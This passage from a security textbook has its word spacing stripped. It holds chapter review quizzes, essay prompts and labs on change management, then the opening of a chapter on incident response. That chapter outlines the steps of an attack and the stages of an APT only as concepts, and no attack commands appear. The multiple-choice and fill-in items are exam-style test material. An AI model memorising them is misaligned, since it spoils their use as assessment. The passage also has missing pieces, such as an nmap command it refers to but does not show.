KeyTermsbaseline(639)CapabilityMaturityModelIntegration(CMMI)(644)changecontrolboard(CCB)(642)changemanagement(635)computersoftwareconfigurationitems(639)configurationauditing(640)configurationcontrol(640)configurationidentification(639)configurationitems(639)configurationmanagement(635)configurationstatusaccounting(640)separationofduties(637)systemproblemreport(SPR)(643)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.The_______________isthebodythatprovidesoversighttothechangemanagementprocess.
2._______________isastandardmethodologyforperformingand
recordingchangesduringsoftwaredevelopmentandoperation.
3._______________istheprocessofassigningresponsibilitiestodifferentindividualssuchthatnosingleindividualcancommitfraudulentormaliciousactions.
4.Proceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaselineare_______________.
5.A_______________describesasystemasitisbuiltandfunctioningatapointintime.
6.Astructuredmethodologythatprovidesanevolutionarypathfromadhocprocessestodisciplinedsoftwaremanagementisthe_______________.
7.Theprocessofverifyingthatconfigurationitemsarebuiltandmaintainedaccordingtorequirements,standards,orcontractualagreementsis_______________.
8.Thedocumentusedbythechangecontrolboardtotrackchangestosoftwareiscalleda_______________.
9.Whenyouidentifywhichassetsneedtobemanagedandcontrolled,youareperforming_______________.
10._______________istheprocessofcontrollingchangestoitemsthathavebeenbaselined.
Multiple-ChoiceQuiz1.Whyshoulddevelopersandtestersavoidusing“live”production
datatoperformvarioustestingactivities?
A.Theuseof“live”productiondataensuresafullandrealistictestdatabase.
B.Theuseof“live”productiondatacanjeopardizetheconfidentialityandintegrityoftheproductiondata.
C.Theuseof“live”productiondataensuresanindependentandobjectivetestenvironment.
D.Developersandtestersshouldbeallowedtouse“live”productiondataforreasonsofefficiency.
2.Softwarechangemanagementproceduresareestablishedto:A.Ensurecontinuityofbusinessoperationsintheeventofa
naturaldisaster
B.Addstructureandcontroltothedevelopmentofsoftwaresystems
C.Ensurechangesinbusinessoperationscausedbyamanagementrestructuringareproperlycontrolled
D.Identifythreats,vulnerabilities,andmitigatingactionsthatcouldimpactanenterprise
3.Whichofthefollowingcorrectlydefinestheprincipleofleastprivilege?
A.Accessprivilegesarereviewedregularlytoensurethatindividualswhonolongerrequireaccesshavehadtheirprivilegesremoved.
B.Authorizationofasubject’saccesstoanobjectdependsonsensitivitylabels.
C.Theadministratordetermineswhichsubjectscanhaveaccesstocertainobjectsbasedonorganizationalsecuritypolicy.
D.Usershavenomoreprivilegesthanarenecessarytoperformtheirjobs.
4.Whichofthefollowingdoesnotadheretotheprinciplesofseparationofduties?
A.Softwaredevelopment,testing,qualityassurance,and
productionshouldbeassignedtothesameindividuals.
B.Softwaredevelopersshouldnothaveaccesstoproductiondataandsource-codefiles.
C.Softwaredevelopersandtestersshouldberestrictedfromaccessing“live”productiondata.
D.Thefunctionsofcreating,installing,andadministratingsoftwareprogramsshouldbeassignedtodifferentindividuals.
5.Configurationauditingis:A.Theprocessofcontrollingchangestoitemsthathavebeen
baselined
B.Theprocessofidentifyingwhichassetsneedtobemanagedandcontrolled
C.Theprocessofverifyingthattheconfigurationitemsarebuiltandmaintainedproperly
D.Theproceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline
6.Whyshouldendusersnotbegivenaccesstoprogramsourcecodes?A.Itcouldallowanendusertoidentifyweaknessesorerrorsin
thesourcecode.
B.Itensuresthattestingandqualityassuranceperformtheirproperfunctions.
C.Itassistsinensuringanindependentandobjectivetestingenvironment.
D.Itcouldallowanendusertoexecutethesourcecode.
7.Configurationcontrolis:A.Theprocessofcontrollingchangestoitemsthathavebeen
baselined
B.Theprocessofidentifyingwhichassetsneedtobemanagedandcontrolled
C.Theprocessofverifyingthattheconfigurationitemsarebuiltandmaintainedproperly
D.Theproceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline
8.Configurationidentificationis:A.Theprocessofverifyingthattheconfigurationitemsarebuilt
andmaintainedproperly
B.Theproceduresfortrackingandmaintainingdatarelativetoeachconfigurationiteminthebaseline
C.Theprocessofcontrollingchangestoitemsthathavebeenbaselined
D.Theprocessofidentifyingwhichassetsneedtobemanagedandcontrolled
9.Whichpositionisresponsibleforapprovingthemovementofexecutablecodetotheproductionsystem?
A.Systemadministrator
B.Developer
C.Manager
D.Qualityassurance
10.Thepurposeofachangecontrolboard(CCB)isto:A.Facilitatemanagementoversightandbetterprojectcoordination
B.Identifywhichassetsneedtobemanagedandcontrolled
C.Establishsoftwareprocessesthatarestructuredenoughthatsuccesswithoneprojectcanberepeatedforanothersimilarproject
D.Trackandmaintaindatarelativetoeachconfigurationiteminthebaseline
EssayQuiz1.Youaretheprojectmanagerforanewweb-basedonlineshopping
system.Duetomarketcompetition,yourmanagementhasdirectedyoutogolivewithyoursystemsoneweekearlierthanoriginallyscheduled.Onememberofyourdevelopmentteamisasharp,smartprogrammerwithlessthanoneyearofexperience.Heasksyouwhyyourteamisrequiredtofollowwhathecallscumbersome,out-of-datechangemanagementprocedures.Whatwouldyoutellhim?
2.Explainwhythechangemanagementprinciplesdiscussedinthischaptershouldbeusedwhenmanagingoperatingsystempatches.
3.Explainwhyadatabaseadministrator(DBA)shouldnotbeallowedtodevelopprogramsonthesystemstheyadminister.
4.YourcompanyhasjustdecidedtofollowtheCapabilityMaturityModelIntegration.Youmanageadevelopmentshopof15programmerswithfourteamleaders.YouandyourteamhavedeterminedthatyouarecurrentlyatCMMI-DEVlevel1,Initial.Describetheactionsyoumighttaketomoveyourshoptolevel3,theDefinedmaturitylevel.
5.YouhavejustbeenmadeDirectorofE-commerceApplications,responsibleforover30programmersandtenmajorsoftwareprojects.Yourprojectsincludemultiplewebpagesontendifferentproductionservers,systemsecurityforthoseservers,threedevelopmentservers,threetest/QAservers,andsomethird-partysoftware.Whichofthoseresourceswouldyouplaceunderchange
managementpracticesandwhy?
LabProjects
•LabProject21.1UsingatypicalITorganizationfromamedium-sizedcompany(100developers,managers,andsupportpersonnel),describethepurpose,organization,andresponsibilitiesofachangecontrolboardappropriateforthisorganization.
•LabProject21.2YouaretheITstaffauditorforthecompanymentionedinthefirstlabproject.Youhavereviewedthechangecontrolboardprocessesandfoundtheyhaveinstitutedthefollowingchangemanagementprocess.Describetwomajorcontrolweaknessesinthisparticularchangemanagementprocess.Whatwouldyoudotocorrectthesecontrolweaknesses?
chapter22 IncidentResponse
Badguyswillfollowtherulesofyournetworktoaccomplishtheirmission.
—RONSCHAFFER,SANSINCIDENTDETECTIONSUMMIT
I
Inthischapter,youwilllearnhowto
Understandthefoundationsofincidentresponseprocesses
Implementthedetailedstepsofanincidentresponseprocess
Describestandardsandbestpracticesthatareinvolvedinincidentresponse
ncidentresponseisbecomingthenewnorminsecurityoperations.Thenewrealityisthatkeepingadversariesoffyournetworkandpreventingunauthorizedactivityisnotgoingtoprovidethelevelofsecuritythe
enterpriserequires.Thismeansthatthesystemneedstobeabletooperateinastateofcompromise,yetstillachievethedesiredsecurityobjectives.Themindsethastochangefrompreventingintrusionandattacktopreventingloss.Thischapterexplorestheuseofanincidentresponsefunctiontoachieve
thegoalsofminimizinglossunderalloperatingconditions.Thiswillmeanashiftinfocus,andachangeinprioritiesaswellassecuritystrategy.Theseeffortscanonlysucceedontopofasolidfoundationofsecurityfundamentalsaspresentedearlierinthebook,sothisisnotastartingplace,butratherthenextstepintheevolutionofdefense.
FoundationsofIncidentResponse
Asuccessfulincidentresponseeffortrequirestwocomponents,knowledgeofone’sownsystemsandknowledgeoftheadversary.Theancientwarrior/philosopherSunTzuexplainsitwellinTheArtofWar:“Ifyouknowtheenemyandknowyourself,youneednotfeartheresultofahundredbattles.Ifyouknowyourselfbutnottheenemy,foreveryvictorygainedyouwillalsosufferadefeat.Ifyouknowneithertheenemynoryourself,youwillsuccumbineverybattle”.
Anincidentisanyeventinaninformationsystemornetworkwheretheresultsaredifferentthannormal.Incidentresponseisnotjustan
informationsecurityoperation.Incidentresponseisaneffortthatinvolvestheentirebusiness.Thesecurityteammayformanucleusoftheeffort,butthekeytasksareperformedbymanypartsofthebusiness.Incidentresponseisatermusedtodescribethestepsanorganization
performsinresponsetoanysituationdeterminedtobeabnormalintheoperationofacomputersystem.Thecausesofincidentsaremany,fromtheenvironment(storms),toerrorsonthepartofusers,tounauthorizedactionsbyunauthorizedusers,tonameafew.Althoughthecausesmaybemany,theresultscanbeclassifiedintoclasses.Alow-impactincidentmaynotresultinanysignificantriskexposure,sonoactionotherthanrepairingthebrokensystemisneeded.Amoderate-riskincidentwillrequiregreaterscrutinyandresponseefforts,andahigh-levelriskexposureincidentwillrequirethegreatestscrutiny.Tomanageincidentswhentheyoccur,atableofguidelinesfortheincidentresponseteamneedstobecreatedtoassistindeterminingthelevelofresponse.Twomajorelementsplayaroleindeterminingthelevelofresponse.
Informationcriticalityistheprimarydeterminant,andthiscomesfromthedataclassificationandthequantityofdatainvolved.Informationcriticalityisdefinedastherelativeimportanceofspecificinformationtothebusiness.Informationcriticalityisakeymeasureusedintheprioritizationofactionsthroughouttheincidentresponseprocess.Thelossofoneadministratorpasswordislessseriousthanthelossofallofthem.Thesecondmajorelementinvolvesabusinessdecisiononhowthisincidentplaysintocurrentbusinessoperations.Aseriesofbreaches,whetherminorornot,indicatesapatternthatcanhavepublicrelationsandregulatoryissues.Onceanincidenthappens,itistimetoreact,andproperreaction
requiresagameplan.Contrarytowhatmanywanttobelieve,therearenomagicsilverbulletstokillthesecuritydemons.Whatisrequiredisasolid,well-rehearsedincidentresponseplan.Thisplaniscustom-tailoredtotheinformationcriticalities,theactualhardwareandsoftwarearchitectures,andthepeople.Likealllarge,complexprojects,thechallengesrapidlybecomeorganizationalinnature—budget,manpower,resources,and
commitment.
IncidentManagement
CERTisatrademarkofCarnegieMellon,andisfrequentlyusedinsomesituations,suchastheUS-CERT.
Havinganincidentresponsemanagementmethodologyisakeyriskmitigationstrategy.OneofthestepsthatshouldbetakentoestablishaplantohandlebusinessinterruptionsasaresultofacybereventofsomesortistheestablishmentofaComputerIncidentResponseTeam(CIRT)oraComputerEmergencyResponseTeam(CERT).Theorganization’sCIRTwillconducttheinvestigationintotheincident
andmaketherecommendationsonhowtoproceed.TheCIRTshouldconsistofnotonlypermanentmembersbutalsoadhocmemberswhomaybecalledupontoaddressspecialneedsdependingonthenatureoftheincident.Inadditiontoindividualswithatechnicalbackground,theCIRTshouldincludenontechnicalpersonneltoprovideguidanceonwaystohandlemediaattention,legalissuesthatmayarise,andmanagementissuesregardingthecontinuedoperationoftheorganization.TheCIRTshouldbecreatedandteammembersshouldbeidentifiedbeforeanincidentoccurs.Policiesandproceduresforconductinganinvestigationshouldalsobeworkedoutinadvanceofanincidentoccurring.Itisalsoadvisabletohavetheteamperiodicallymeettoreviewtheseprocedures.
AnatomyofanAttackAttackershaveamethodbywhichtheyattackasystem.Althoughthespecificsmaydifferfromeventtoevent,therearesomecommonstepsthatarecommonlyemployed.Therearenumeroustypesofattacks,fromold-schoolhackingtothenewadvancedpersistentthreat(APT)attack.The
differencesaresubtleandarerelatedtotheobjectivesofeachformofattack.
OldSchoolAttacksarenotanewphenomenoninenterprisesecurity,andahistoricalexaminationoflargenumbersofattacksshowsomecommonmethods.Thesearethetraditionalsteps:
1.Footprinting2.Scanning3.Enumeration4.Gainaccess5.Escalateprivilege6.Pilfer7.Createbackdoors8.Covertracks9.Denialofservice(DOS)
TechTip
UsingnmaptoFingerprintanOperatingSystemTousenmaptofingerprintanoperatingsystem,usethe–Ooption:
Thiscommandperformsascanofinterestingportsonthetarget(scanme.nmap.org)andattemptstoidentifytheoperatingsystem.The–voptionindicatesthatyouwantverboseoutput.
Footprintingisthedeterminationoftheboundariesofatargetspace.Therearenumeroussourcesofinformation,includingwebsites,DNSrecords,andIPaddressregistrations.Understandingtheboundariesassistsanattackerinknowingwhatisintheirtargetrangeandwhatisn’t.Scanningistheexaminationofmachinestodeterminewhatoperatingsystems,services,andvulnerabilitiesexist.Theenumerationstepisalistingofthesystemsandvulnerabilitiestobuildanattackgameplan.Thefirstactualincursionisthegainingofaccesstoanaccountonthesystem,almostalwaysanordinaryuser,ashigher-privilegeaccountsarehardertotarget.Thenextstepistogainaccesstoahigher-privilegeaccount.Froma
higher-privilegeaccount,therangeofaccessibleactivitiesisgreater,includingpilferingfiles,creatingbackdoorssoyoucanreturn,andcoveringyoutracksbyerasinglogs.Thedetailassociatedwitheachstepmayvaryfromhacktohack,butinmostcases,thesestepswereemployedinthismannertoachieveanobjective.
AdvancedPersistentThreatArelativelynewattackphenomenonhasbeenlabeledtheadvancedpersistentthreat.Anadvancedpersistentthreat(APT)isanattackthatalwaysmaintainsaprimaryfocusonremaininginthenetwork,operatingundetected,andhavingmultiplewaysinandout.APTsbeganwithnation-stateattackers,buttheutilityofthelong-termattackhasprovenvaluable,andmanysophisticatedattackshavemovedtothisroute.MostAPTsbeginviaaphishingorspearphishingattack,whichestablishesafootholdinthesystemunderattack.Fromthisfoothold,theattackmethodologyissimilartothetraditionalattackmethoddescribedintheprevioussection,butadditionalemphasisisplacedonthestepsneededtomaintainapresenceonanetwork:
1.Definetarget2.Researchtarget
3.Selecttools4.Testfordetection5.Initialintrusion6.Establishoutboundconnection7.Obtaincredentials8.Expandaccess9.Strengthenfoothold10.Covertracks11.Exfiltratedata
Theinitialintrusionisusuallyperformedviasocialengineering(spearphishing),overe-mail,usingzero-day-basedcustommalware.Anotherpopularinfectionmethodistheuseofawateringholeattack,plantingthemalwareonawebsitethatthevictimemployeeswilllikelyvisit.Theuseofcustommalwaremakesdetectionoftheattackbyantivirus/malwareprogramsanearimpossibility.Aftertheattackersgainaccess,theyattempttoexpandaccessandstrengthenthefoothold.ThisisdonebyplantingremoteadministrationTrojan(RAT)softwareinthevictim’snetwork,creatingnetworkbackdoorsandtunnelsallowingstealthaccesstoitsinfrastructure.Thenextstep,obtainingcredentialsandescalatingprivileges,is
performedthroughtheuseofexploitsandpasswordcracking.Thetrueobjectiveistoacquireadministratorprivilegesoveravictim’scomputerandultimatelyexpandittoWindowsdomainadministratoraccounts.OneofthehallmarksofanAPTattackistheemphasisonmaintainingapresenceonthesystemtoensurecontinuedcontroloveraccesschannelsandcredentialsacquiredinprevioussteps.Acommontechniqueusedislateralmovementacrossanetwork.Movinglaterallyallowsanattackertoexpandcontroltootherworkstations,servers,andinfrastructureelementsandperformdataharvestingonthem.Attackersalsoperforminternal
reconnaissance,collectinginformationonsurroundinginfrastructure,trustrelationships,andinformationconcerningtheWindowsdomainstructure.
TechTip
APTattackmodelThecomputersecurityinvestigativefirmMandiant(nowadivisionofFireEye)wasoneofthepioneersintheuseofincidentresponsetechniquesagainstAPT-styleattacks.TheypublishedamodelofanAPTattacktouseasaguide:
1.Initialcompromise2.Establishfoothold3.Escalateprivileges4.Internalreconnaissance5.Movelaterally6.Maintainpresence7.Completemission
Thekeystepisstep5,lateralmovement.Thisiswheretheadversarytraversesyournetwork,usingmultipleaccounts,anddoessotodiscovermaterialworthstealingaswellastoavoidbeinglockedoutbynormaloperationalchanges.Thisisoneelementthatcanbeleveragedtohelpslowdown,detect,anddefeatAPTattacks.BlockinglateralmovementcandefeatAPT-styleattacksfromspreadingthroughanetworkandlimittheirstealth.
GoalsofIncidentResponseThegoalsofanincidentresponseprocessaremultidimensionalinnature:
Confirmordispelincident
Promoteaccurateinformationaccumulation
Establishcontrolsforevidence
Protectprivacyrights
Minimizedisruptiontooperations
Allowforlegal/civilrecourse
Provideaccuratereports/recommendations
Incidentresponsedependsuponaccurateinformation.Withoutit,thechanceoffollowingdatainthewrongdirectionisapossibility,asismissingcrucialinformationandonlyfindingdeadends.Theprecedinggoalsareessentialfortheviabilityofanincidentresponseprocessandthedesiredoutcomes.
IncidentResponseProcessIncidentresponseisthesetofactionssecuritypersonnelperforminresponsetoawiderangeoftriggeringevents.Theseactionsarevastandvariedbecausetheyhavetodealwithawiderangeofcausesandconsequences.Throughtheuseofastructuredframework,coupledwithproperlypreparedprocesses,incidentresponsebecomesamanageabletask.Withoutproperpreparation,thistaskcanquicklybecomeimpossibleorintractablyexpensive.Incidentresponseisthenewbusinessculturalnormininformation
security.Thekeyistodesigntheprocedurestoincludeappropriatebusinesspersonnel,notkeepitasapureinformationsecurityendeavor.Thechallengesaremany,includingtheaspectoftimingastheactivitiesquicklybecomeacaseofonegroupofprofessionalspursuinganother.Incidentresponseisamultistepprocesswithseveralcomponent
elements.Thefirstisorganizationpreparation,followedbysystempreparation.Aninitialdetectionisfollowedbyinitialresponse,thenisolation,investigation,recovery,andreporting.Thereareadditionalprocessstepsoffollow-upandlessonslearned,eachofwhichispresentedinfollowingsections.Incidentresponseisakeyelementofasecuritypostureandmustinvolvemanydifferentaspectsofthebusinesstoproperlyrespond.Thisisbestbuiltuponthefoundationofacomprehensiveincidentresponsepolicythatdetailstherolesandresponsibilitiesoftheorganizationalelementswithrespecttotheprocesselementsdetailedinthischapter.
TechTip
IncidentResponseDefinedNISTSpecialPublication800-61definesanincidentastheactofviolatinganexplicitorimpliedsecuritypolicy.Thisviolationcanbeintentional,incidental,oraccidental,withcausesbeingwideandvariedinnature.Theseincludebutarenotlimitedtothefollowing:
Attempts(eitherfailedorsuccessful)togainunauthorizedaccesstoasystemoritsdataUnwanteddisruptionordenialofservice
TheunauthorizeduseofasystemfortheprocessingorstorageofdataChangestosystemhardware,firmware,orsoftwarecharacteristicswithouttheowner’sknowledge,instruction,orconsent
EnvironmentalchangesthatresultindatalossordestructionAccidentalactionsthatresultindatalossordestruction
Preparation
Theoldadagethat“thosewhofailtoprepare,preparetofail”certainlyappliestoincidentresponse.Withoutadvancepreparation,anorganization’sresponsetoasecurityincidentwillbehaphazardandineffective.Establishingtheprocessesandprocedurestofollowinadvanceofaneventiscritical.
Incidentresponseeffortsbeginbeforeanincidentoccurs—thatis,before“somethinggoeswrong.”Preparingforanincidentisthefirstphase.Theorganizationneedstoestablishthestepstobetakenwhenanincidentisdiscovered(orsuspected);determinepointsofcontact;trainallemployeesandsecurityprofessionalssotheyunderstandthestepstotakeandwhotocall;establishanincidentresponseteam;acquiretheequipmentnecessarytodetect,contain,andrecoverfromanincident;establishtheproceduresandguidelinesfortheuseoftheequipmentobtained;andtrainthosewhowillusetheequipment.Duringthisphase,generalusertraininginareas
suchassocialengineeringshouldbeaccomplished,aswellasanyadditionalspecializedtraininginareassuchascomputerforensicsthatisdeterminedtobenecessary.
OrganizationPreparationPreparinganorganizationrequiresaplan,bothfortheinitialeffortandformaintenanceofthateffort.Overtime,theorganizationshiftsbasedonbusinessobjectives,personnelchange,businesseffortsandfocuschange,newprograms,newcapabilities;virtuallyanychangecannecessitateshiftsintheincidentresponseactivities.Ataminimum,thefollowingitemsshouldbeaddressedandperiodicallyreviewedintermsofincidentresponsepreparation:
Developandmaintaincomprehensiveincidentresponsepoliciesandprocedures
EstablishandmaintainanIncidentResponseTeam
Obtaintop-levelmanagementsupport
Agreetogroundrules/rulesofengagement
Developscenariosandresponses
Developandmaintainanincidentresponsetoolkit
Systemplansanddiagrams
Networkarchitectures
Criticalassetlists
Practiceresponseprocedures
Firedrills
Scenarios(“Whodoyoucall?”)
SystemPreparation
Systemsrequirepreparationforeffectiveincidentresponseefforts.Incidentrespondersaredependentupondocumentationforunderstandinghardware,software,andnetworklayouts.Understandinghowaccesscontrolisemployed,includingspecificsacrossallsystems,iskeywhendeterminingwhocandowhat—acommonincidentresponsequestion.Understandingtheloggingmethodologyandarchitecturewillmakeincidentresponsedataretrievaleasier.Allofthesequestionsshouldbeaddressedinplanningofdiagrams,accesscontrol,andlogging,toensurethatthesecriticalsecurityelementsarecapturingthecorrectinformationbeforeanincident.
TechTip
PreparingforIncidentDetectionToensurethatdiscoveringincidentsisnotanadhoc,hit-or-missproposition,theorganizationneedstoestablishproceduresthatdescribetheprocessadministratorsmustfollowtomonitorforpossiblesecurityevents.Thetoolsforaccomplishingthistaskareidentifiedduringthepreparationphase,aswellasanyrequiredtraining.Theproceduresgoverningthemonitoringtoolsusedshouldbeestablishedaspartofthespecificguidelinesgoverningtheuseofthetoolsbutshouldincludereferencestotheincidentresponsepolicy.
Havinglistsofcriticalfilesandtheirhashvalues,allstoredoffline,canmakesysteminvestigationamoreefficientprocess.Intheend,whenarchitectingasystem,takingthetimetoplanforincidentresponseprocesseswillbecrucialtoasuccessfulresponseonceanincidentoccurs.Preparingsystemsforincidentresponseissimilartopreparingthemformaintainability,sotheseeffortscanyieldregulardividendstothesystemowners.Determiningthestepstoisolatespecificmachinesandservicescanbeacomplexendeavor,andisonebestaccomplishedbeforeanincident,throughthepreparationphase.
ResearchingVulnerabilitiesAfterthehackerhasalistofsoftwarerunningonthesystems,hewillstart
researchingtheInternetforvulnerabilitiesassociatedwiththatsoftware.Numerouswebsitesprovideinformationonvulnerabilitiesinspecificapplicationprogramsandoperatingsystems.Understandinghowhackersnavigatesystemsisimportant,forsystemadministratorsandsecuritypersonnelcanusethesamestepstoresearchpotentialvulnerabilitiesbeforeahackerstrikes.Thisinformationisvaluabletoadministratorswhoneedtoknowwhatproblemsexistandhowtopatchthem.
IncidentResponseTeamEstablishinganincidentresponseteamisanessentialstepinthepreparationphase.Althoughtheinitialresponsetoanincidentmaybehandledbyanindividual,suchasasystemadministrator,thecompletehandlingofanincidenttypicallytakesanentireteam.Anincidentresponseteamisagroupofpeoplethatpreparesforandrespondstoanyemergencyincident,suchasanaturaldisasteroraninterruptionofbusinessoperations.Acomputersecurityincidentresponseteaminanorganizationtypicallyincludeskeyskilledmemberswhobringawiderangeofskillstobearintheresponseeffort.Incidentresponseteamsarecommonincorporationsaswellasinpublicserviceorganizations.Incidentresponseteammembersideallyaretrainedandpreparedto
fulfilltherolesrequiredbythespecificsituation(forexample,toserveasincidentcommanderintheeventofalarge-scalepublicemergency).Incidentresponseteamsarefrequentlydynamicallysizedtothescaleandnatureofanincident,andasthesizeofanincidentgrowsandasmoreresourcesaredrawnintotheevent,thecommandofthesituationmayshiftthroughseveralphases.Inasmall-scaleevent,orinthecaseofasmallfirm,usuallyonlyavolunteeroradhocteammayexisttorespond.Incaseswheretheincidentspreadsbeyondthelocalcontroloftheincidentresponseteam,higher-levelresourcesthroughindustrygroupsandgovernmentgroupsexisttoassistintheincident.Advancedpreparationintheformofcontactingandestablishingworkingrelationswithhigher-levelgroupsisanimportantpreparationstep.Theincidentresponseteamisacriticalpartoftheincidentresponse
plan.Teammembershipwillvarydependingonthetypeofincidentorsuspectedincident,butmayincludethefollowingmembers:
Teamlead
Network/securityanalyst
Internalandexternalsubjectmatterexperts
Legalcounsel
Publicaffairsofficer
Securityofficecontact
TechTip
IncidentResponseTeamQuestionsWell-executedplansareoftenwelltested;whenandhowoftendoyoutestyourresponseplans?Howwillyourteamoperateundetectedinanenvironmentownedbytheadversary?Doyouhaveabackup,separatee-mailsystemthatisexternaltotheenterprisesolution?Isitencrypted?
Indeterminingthespecificmakeupoftheteamforaspecificincident,therearesomegeneralpointstothinkabout.Theteamneedsaleader,preferablyahigher-levelmanagerwhohastheabilitytoobtaincooperationfromemployeesasneeded.Italsoneedsacomputerornetworksecurityanalyst,sincetheassumptionisthattheteamwillberespondingtoacomputersecurityincident.Specialistsmaybeaddedtotheteamforspecifichardwareorsoftwareplatformsasneeded.Theorganization’slegalcounselshouldbepartoftheteamonatleastapart-timeoras-neededbasis.Thepublicaffairsofficeshouldalsobeavailableonanas-neededbasis,becauseitisresponsibleforformulatingthepublicresponseshouldasecurityincidentbecomepublic.Theorganization’ssecurityofficeshouldalsobekeptinformed.Itshoulddesignateapointofcontactfortheteamincasecriminalactivityissuspected.Inthiscase,care
mustbetakentopreserveevidenceshouldtheorganizationdecidetopushforprosecutionoftheindividual(s).Thisisbynomeansacompletelist,aseachorganizationisdifferentand
needstoevaluatewhatthebestmixtureisforitsownresponseteam.Whateverthedecision,thecompositionoftheteam,andhowandwhenitwillbeformedneedstobeclearlyaddressedinthepreparationphaseoftheincidentresponsepolicy.Tofunctioninatimelyandefficientmanner,ideallyateamhasalready
definedaprotocolorsetofactionstoperformtomitigatethenegativeeffectsofmostcommonformsofanincident.Onekeyandoftenoverlookedmemberoftheincidentresponseteamisthebusiness.ItmaybeanITsystembeinginvestigated,butthedata,processes,andvalueallbelongtothebusiness,andthebusinessistheelementthatunderstandstheriskandvalueofwhatisunderattack.Havingkey,knowledgeablebusinessmembersontheincidentresponseteamisanecessitytoensurethatthesecurityactionsremainalignedwiththebusinessgoalsandobjectivesoftheorganization.
SecurityMeasureImplementationAlldatathatisstoredissubjecttobreachorcompromise.Giventhisassumption,thequestionbecomes,whatisthebestmitigationstrategytoreducetheriskassociatedwithbreachorcompromise?Datarequiresprotectionineachofthethreestatesofthedatalifecycle:instorage,intransit,andduringprocessing.Thelevelofriskineachstatediffersduetoseveralfactors:
TimeDatatendstospendmoretimeinstorage,andhenceissubjecttobreachorcompromiseoverlongertimeperiods.
QuantityDatainstoragetendstoofferagreaterquantitytobreachorcompromisethandataintransit,anddatainprocessingoffersevenless.Ifrecordsarebeingcompromisedwhilebeingprocessed,thenonlyrecordsbeingprocessedaresubjectedtorisk.
AccessDifferentprotectionmechanismsexistineachofthedomains,andthishasadirecteffectontheriskassociatedwithbreachorcompromise.Operatingsystemstendtohaveverytightcontrolstopreventcross-processdataissuessuchaserrorandcontamination.
Thenextaspectofriskduringprocessingiswithinprocessaccesstothedata,andavarietyofattacktechniquesaddressthischannelspecifically.Dataintransitissubjecttobreachorcompromisefromavarietyofnetwork-levelattacksandvulnerabilities.Someoftheseareunderthecontroloftheenterprise,andsomearenot.Oneprimarymitigationstepisdataminimization.Dataminimization
effortscanplayakeyroleinbothoperationalefficiencyandsecurity.Oneofthefirstrulesassociatedwithdataisthis:Don’tkeepwhatyoudon’tneed.Asimpleexampleofthisisthecaseofspamremediation.Ifspamisseparatedfrome-mailbeforeithitsamailbox,onecanassertthatitisnotmailandnotsubjecttostorage,backup,ordataretentionissues.Asspamcancomprisegreaterthan50percentofincomingmail,spamremediationcandramaticallyimproveoperationalefficiencyintermsofbothspeedandcost.Thissameprincipleholdstrueforotherformsofinformation.When
processingcreditcardtransactions,certaindataelementsarerequiredfortheactualtransaction,butoncethetransactionisapproved,theyhavenofurtherbusinessvalue.Storingofthisinformationprovidesnobusinessvalue,yetitdoesrepresentariskinthecaseofadatabreach.Datastorageshouldbegovernednotbywhatyoucanstore,butbythebusinessneedtostore.Whatisnotstoredisnotsubjecttobreach,andminimizingstoragetoonlywhatissupportedbybusinessneedreducesriskandcosttotheenterprise.Minimizationeffortsbeginbeforedataevenhitsasystem,letalonea
breach.Duringsystemdesign,theappropriatesecuritycontrolsaredeterminedanddeployed,withperiodicauditstoensurecompliance.Thesecontrolsarebasedonthesensitivityoftheinformationbeingprotected.Onetoolthatcanbeusedtoassistintheselectionofcontrolsis
adataclassificationscheme.Notalldataisequallyimportant,norisitequallydamagingintheeventofloss.Developinganddeployingadataclassificationschemecanassistinpreventativeplanningeffortswhendesigningsecurityfordataelements.
ExamTip:Databreachesmaynotbepreventable,buttheycanbemitigatedthroughminimizationandencryptionefforts.
IncidentIdentification/DetectionAnincidentisdefinedasasituationthatdepartsfromnormal,routineoperations.Whetheranincidentisimportantornotisthefirstdeterminationtobemadeaspartofanincidentresponseprocess.Asinglefailedloginistechnicallyanincident,butifitisfollowedbyacorrectlogin,thenitisnotofanyconsequence.Infact,thiscouldevenbeconsideredasnormal.But10,000failedattemptsonasystem,orfailuresacrossalargenumberofaccounts,aredistinctlydifferentandmaybeworthyoffurtherinvestigation.Akeyfirststepisintheprocessingofinformationandthedetermination
ofwhetherornottoinvokeincidentresponseprocesses.Incidentinformationcancomefromawiderangeofsources,includinglogs,employees,helpdeskcalls,systemmonitoring,securitydevices,andmore.Thechallengeistodetectthatsomethingotherthansimplecommon,routineerrorsisoccurring.Whenevidenceaccumulates,orinsomecaseswhenspecificitemssuchassecuritydevicelogsindicateapotentialincident,thenextstepistoescalatethesituationtotheincidentresponseteam.
DetectionOfcourse,anincidentresponseteamcan’tbeginaninvestigationuntilasuspectedincidenthasbeendetected.Atthatpoint,thedetectionphaseof
theincidentresponsepolicykicksin.Oneofthefirstjobsoftheincidentresponseteamistodeterminewhetheranactualsecurityincidenthasoccurred.Manythingscanbemisinterpretedasapossiblesecurityincident.Forexample,asoftwarebuginanapplicationmaycauseausertoloseafile,andtheusermayblamethisonavirusorsimilarmalicioussoftware.Theincidentresponseteammustinvestigateeachreportedincidentandtreatitasapotentialsecurityincidentuntilitcandeterminewhetheritisorisn’t.Thismeansthatyourorganizationwillwanttorespondinitiallywithalimitedresponseteambeforewastingalotoftimehavingthefullteamrespond.Thisistheinitialsteptotakewhenareportisreceivedthatapossibleincidenthasbeendetected.Securityincidentscantakeavarietyofforms,andwhodiscoversthe
incidentwillvaryaswell.Oneofthegroupsmostlikelytodiscoveranincidentistheteamofnetworkandsecurityadministratorswhorundevicessuchastheorganization’sfirewallsandintrusiondetectionsystems.Anothercommonincidentisavirus.Severalpackagesareavailablethat
canhelpanorganizationdetectpotentialvirusactivityorothermaliciouscode.Administratorswilloftenbetheonestonoticesomethingisamiss,butsomightanaverageuserwhohasbeenhitbythevirus.Socialengineeringisacommontechniqueusedbypotentialintrudersto
